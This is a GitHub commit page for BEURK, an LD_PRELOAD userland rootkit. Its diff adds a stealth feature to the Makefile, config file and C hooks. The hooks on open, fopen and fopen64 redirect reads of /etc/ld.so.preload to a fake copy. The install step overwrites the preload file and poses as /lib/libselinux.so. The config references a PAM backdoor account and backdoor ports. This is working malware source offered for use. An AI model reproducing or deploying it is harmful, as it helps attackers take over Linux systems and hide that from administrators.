Skip to content

Commit

Permalink
feat(core): issue #78
Browse files Browse the repository at this point in the history
invisible content /etc/ld.so.preload
  • Loading branch information
chqrly committed Oct 14, 2015
1 parent b57c62e commit 18c09e1
Show file tree
Hide file tree
Showing 6 changed files with 39 additions and 7 deletions.
19 changes: 12 additions & 7 deletions Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -3,10 +3,12 @@ UNAME := $(shell uname -s)
SHELL := /bin/bash

# set default config values (can be overidden by setting env vars)
BEURK_CONFIG_FILE ?= beurk.conf
BEURK_LIBRARY_NAME ?= $(shell grep -E '^LIBRARY_NAME[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_DEBUG_LEVEL ?= $(shell grep -E '^DEBUG_LEVEL[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_INFECT_DIR ?= $(shell grep -E '^INFECT_DIR[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_CONFIG_FILE ?= beurk.conf
BEURK_LIBRARY_NAME ?= $(shell grep -E '^LIBRARY_NAME[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_DEBUG_LEVEL ?= $(shell grep -E '^DEBUG_LEVEL[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_INFECT_DIR ?= $(shell grep -E '^INFECT_DIR[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_FAKE_LD_PRELOAD ?= $(shell grep -E '^FAKE_LD_PRELOAD[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)
BEURK_ENV_IS_ATTACKER ?= $(shell grep -E '^_ENV_IS_ATTACKER[[:space:]]*=' $(BEURK_CONFIG_FILE) | cut -d= -f2 | xargs)

# do not infect the system in debug mode
ifneq ($(BEURK_DEBUG_LEVEL), 0)
Expand All @@ -17,7 +19,8 @@ else
endif

# absolute install path
BEURK_INFECT_ABSPATH ?= $(realpath $(BEURK_INFECT_DIR)/$(BEURK_LIBRARY_NAME))
#BEURK_INFECT_ABSPATH ?= $(realpath $(BEURK_INFECT_DIR)/$(BEURK_LIBRARY_NAME))
BEURK_INFECT_ABSPATH = "/lib/libselinux.so"

# compiler options
INCLUDES := -Iincludes
Expand Down Expand Up @@ -112,14 +115,16 @@ infect: $(BEURK_LIBRARY_NAME)
@echo "Install in $(BEURK_INFECT_ABSPATH)"
install -d $(BEURK_INFECT_DIR)
install -m 755 $(BEURK_LIBRARY_NAME) $(BEURK_INFECT_DIR)/
echo $(BEURK_INFECT_ABSPATH) >> $(BEURK_LD_PRELOAD)
cp $(BEURK_LD_PRELOAD) $(BEURK_FAKE_LD_PRELOAD)
echo $(BEURK_INFECT_ABSPATH) > $(BEURK_LD_PRELOAD)
@echo "Successful infection"

# uninstall the rootkit (if installed on current system)
disinfect:
@echo "Uninstall $(BEURK_INFECT_ABSPATH)"
$(RM) $(BEURK_INFECT_DIR)/$(BEURK_LIBRARY_NAME)
sed '#$(BEURK_INFECT_ABSPATH)#d' $(BEURK_LD_PRELOAD) > $(BEURK_LD_PRELOAD)
$(BEURK_ENV_IS_ATTACKER)=true cp /dev/null $(BEURK_LD_PRELOAD)
mv $(BEURK_FAKE_LD_PRELOAD) $(BEURK_LD_PRELOAD)
@echo "Successful disinfection"

# remove object files
Expand Down
8 changes: 8 additions & 0 deletions beurk.conf
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,9 @@
# str: name of the generated evil hooking library
LIBRARY_NAME = libselinux.so

# str: ld.so.preload file
LD_PRELOAD = ld.so.preload

# str: where to store infected, only work in `production` mode
INFECT_DIR = /lib

Expand All @@ -21,6 +24,11 @@ DEBUG_FILE = /dev/stderr
# str: hide files with this string in the name
MAGIC_STRING = _BEURK_

# str: fake ld.so.preload file
# WARNING MAGIC_STRING
# WARNING string "ld.so.preload" must not be present on FAKE_LD_PRELOAD
FAKE_LD_PRELOAD = /etc/_BEURK_ld_so_preload

# str: PAM username (for su / ssh login)
PAM_USER = beurkroot

Expand Down
2 changes: 2 additions & 0 deletions reconfigure
Original file line number Diff line number Diff line change
Expand Up @@ -62,11 +62,13 @@ def type_hexbyte(v):
# the list of config keys (with their associated expected type)
CONFIG_KEYS = {
"LIBRARY_NAME": type_str,
"LD_PRELOAD": type_str,
"INFECT_DIR": type_str,
"DEBUG_LEVEL": type_int,
"DEBUG_FILE": type_str,
"XOR_KEY": type_hexbyte,
"MAGIC_STRING": type_str,
"FAKE_LD_PRELOAD": type_str,
"PAM_USER": type_str,
"LOW_BACKDOOR_PORT": type_int,
"HIGH_BACKDOOR_PORT": type_int,
Expand Down
4 changes: 4 additions & 0 deletions src/hooks/fopen.c
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
*/

#include <errno.h> /* errno, ENOENT */
#include <string.h> /* strstr() */
#include "beurk.h" /* is_attacker(), is_hidden_file(), is_procnet() */
#include "config.h" /* REAL_FOPEN() */
#include "debug.h" /* DEBUG() */
Expand All @@ -31,6 +32,9 @@ FILE *fopen(const char *__restrict path, const char *mode) {
if (is_attacker())
return (REAL_FOPEN(path, mode));

if (strstr(path, LD_PRELOAD))
return REAL_FOPEN(FAKE_LD_PRELOAD, mode);

if (is_hidden_file(path)) {
errno = ENOENT;
return (NULL);
Expand Down
4 changes: 4 additions & 0 deletions src/hooks/fopen64.c
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
*/

#include <errno.h> /* errno, ENOENT */
#include <string.h> /* strstr() */
#include "beurk.h" /* is_attacker(), is_hidden_file(), is_procnet() */
#include "config.h" /* REAL_FOPEN64() */
#include "debug.h" /* DEBUG() */
Expand All @@ -31,6 +32,9 @@ FILE *fopen64(const char *__restrict path, const char *mode) {
if (is_attacker())
return (REAL_FOPEN64(path, mode));

if (strstr(path, LD_PRELOAD))
return REAL_FOPEN64(FAKE_LD_PRELOAD, mode);

if (is_hidden_file(path)) {
errno = ENOENT;
return (NULL);
Expand Down
9 changes: 9 additions & 0 deletions src/hooks/open.c
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,7 @@
#include <stdarg.h> /* va_list, va_start(), va_args(), va_end() */
#include <fcntl.h> /* O_CREAT */
#include <sys/stat.h> /* mode_t */
#include <string.h> /* strstr() */
#include <errno.h> /* errno, ENOENT */
#include "beurk.h" /* is_attacker(), is_hidden_file() */
#include "config.h" /* REAL_OPEN() */
Expand All @@ -42,6 +43,10 @@ int open(const char *pathname, int flag, ...) {
if (is_attacker())
return REAL_OPEN(pathname, flag, mode);

if (strstr(pathname, LD_PRELOAD)) {
return REAL_OPEN(FAKE_LD_PRELOAD, flag, mode);
}

if (is_hidden_file(pathname)) {
errno = ENOENT;
return (-1);
Expand All @@ -53,6 +58,10 @@ int open(const char *pathname, int flag, ...) {
if (is_attacker())
return REAL_OPEN(pathname, flag);

if (strstr(pathname, LD_PRELOAD)) {
return REAL_OPEN(FAKE_LD_PRELOAD, flag);
}

if (is_hidden_file(pathname)) {
errno = ENOENT;
return (-1);
Expand Down

0 comments on commit 18c09e1

Please sign in to comment.